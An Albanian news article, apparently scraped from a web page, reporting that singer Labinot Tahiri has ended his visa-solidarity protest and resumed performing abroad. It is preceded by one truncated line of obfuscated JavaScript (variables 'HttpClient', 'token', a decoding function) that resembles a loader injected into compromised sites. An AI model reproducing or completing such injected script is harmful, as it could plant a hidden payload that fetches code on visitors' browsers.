;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Labi demokratikisht përfundon solidarizimin me qytetarët pa viza (FOTO)

By

Këngëtari i mirënjohur, Labinot Tahiri, i ka dhënë fund solidarizimit me kosovarët që janë pa viza.

Para një viti ai e mori vendimin që ta kthejë pasaportën e tij në ministri dhe të heqë dorë nga udhëtimet jashtë shtetit, si shenjë proteste dhe solidarizimi me qytetarët e vendit tonë për shkak të mos liberalizimit të vizave.

Këtë ai e bëri edhe duke e pasur parasysh që do t’i kushtonte me humbje të parave, sepse është shumë i kërkuar nëpër koncerte jashtë shtetit dhe rrjedhimisht kështu fitonte edhe shuma të majme parash.

Megjithatë, tani pas një viti, ai iu rikthye këndimit për shqiptarët e diasporës dhe këtë e bëri të ditur me anë të postimeve në Instagram.

 

Para disa ditësh me anë të një postimi në Facebook, Labi i kishte falënderuar ndjekësit, që sipas tij, kishin votuar që ai të niste sërish me udhëtime  jashtë shtetit.

Faleminderit të gjithë atyre 50.000 votuesve që vendosën për mua që të filloj udhëtimet e mia sërish nëpër Evropë, për arsye se me ato të ardhura ndihmojmë edhe qytetarët edhe familjen time”, ka shkruar ai.

Ndërkaq, kujtojmë se Labi së fundmi erdhi më një bashkëpunim interesant, duke publikuar këngën “Gabove” së bashku me Skerdin.

Artikuj të ngjashëm